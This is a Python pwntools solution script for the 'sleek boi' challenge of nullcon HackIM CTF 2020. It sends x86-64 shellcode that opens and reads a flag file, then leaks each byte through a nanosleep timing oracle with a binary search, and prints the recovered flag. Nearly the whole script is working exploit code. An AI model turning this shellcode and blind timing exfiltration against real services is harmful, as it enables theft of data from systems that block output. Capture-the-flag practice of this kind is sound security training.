sleek boi script - nullcon HackIM CTF 2020
import sys
import time

from pwn import *
# Everything assembled with asm() in this file targets x86-64.
context.arch = "amd64"

# Challenge endpoint; bruteforce_char() opens one connection per probe.
HOST = "pwn4.ctf.nullcon.net"
PORT = 5003
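def screen_clean():
    """Erase the previous terminal line so per-round progress overwrites in place.

    Writes two ANSI CSI sequences -- ESC[F (cursor to the start of the previous
    line) and ESC[K (erase to end of line) -- and flushes stdout. The flush is
    needed because the sequence carries no newline, so a line-buffered stdout
    would otherwise hold it back until some later output arrives.
    """
    sys.stdout.write("\033[F\033[K")
    sys.stdout.flush()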
def send_shellcode(io, offset, limit_intval):
    """Assemble and send the timing-oracle payload for a single probe.

    The x86-64 shellcode below (context.arch is set at module level; the
    syscall numbers are the Linux x86-64 ones) does, in order:
      1. open("flag", 0): the literal 0x67616c66 is "flag" little-endian and
         the push leaves the upper bytes zero, so the string is NUL-terminated;
      2. lseek(fd, offset, 0) followed by read(fd, rsp, 1) to fetch one byte;
      3. cmp al, limit_intval (signed byte compare) -- a smaller byte jumps to
         `crash` and falls off the end, otherwise `hit` calls nanosleep({3, 0}).
    The caller converts "slept about 3 s" versus "died at once" into one bit of
    its binary search, so the only signal leaving the target is timing.

    Args:
        io: pwntools tube connected to the target.
        offset: index of the flag byte to probe.
        limit_intval: threshold compared against the byte at *offset*.
    """
    template = """
        push 0x67616c66
        mov rax, 2
        mov rdi, rsp
        xor rsi, rsi
        xor rdx, rdx
        syscall
        push rax
        mov rdi, rax
        mov rax, 8
        mov rsi, %d
        mov rdx, 0
        syscall
        pop rdi
        mov rax, 0
        sub rsp, 8
        mov rsi, rsp
        mov rdx, 0x1
        syscall
        mov al, byte ptr [rsp]
        cmp al, %d
        jl crash
        hit:
        push 0
        push 3
        mov rdi, rsp
        xor rsi, rsi
        mov rax, 35
        syscall
        crash:
        nop
    """
    probe = template % (offset, limit_intval)
    io.sendline(asm(probe))
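def bruteforce_char(offset):
    """Recover the flag byte at *offset* by a timing-based binary search.

    Every round opens a fresh connection and sends shellcode that sleeps for
    3 s only when the byte at *offset* is >= the probed threshold (see
    send_shellcode). Whether the connection outlived the 3.0 s cut-off is the
    single bit used to narrow the half-open window [base_limit, top_limit).
    Seven halvings of the 128-wide window leave one candidate; the eighth
    round re-probes it, since curr_limit then equals base_limit.

    Args:
        offset: index of the flag byte to recover.

    Returns:
        The recovered byte as a one-character string.
    """
    base_limit = 0    # inclusive lower bound of the candidate byte
    top_limit = 128   # exclusive upper bound (7-bit ASCII search space)
    for _ in range(8):
        io = remote(HOST, PORT)
        try:
            screen_clean()
            curr_limit = (top_limit + base_limit) // 2
            send_shellcode(io, offset, curr_limit)
            start = time.time()
            try:
                io.recv()
            except EOFError:
                # The remote side closed; only the elapsed time matters.
                pass
            # A wait longer than the shellcode's 3 s sleep means byte >= curr_limit.
            if time.time() - start > 3.0:
                base_limit = curr_limit
            else:
                top_limit = curr_limit
            log.info("Current character --> " + chr(curr_limit) + " (" + str(base_limit) + ", " + str(top_limit) + ")")
        finally:
            # Release the socket even if recv() raises something other than EOFError.
            io.close()
    screen_clean()
    log.success("Char found --> " + chr(curr_limit))
    return chr(curr_limit)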
# Recover the flag one byte at a time until the closing brace appears.
flag = ""
cnt = 0
while True:
    flag += bruteforce_char(cnt)
    log.info("Progress --> %s" % flag)
    cnt += 1
    if "}" in flag:
        break
log.success("FLAG --> %s" % flag)
# [+] FLAG --> hackim20{OMG_The_first_one_was_unintended}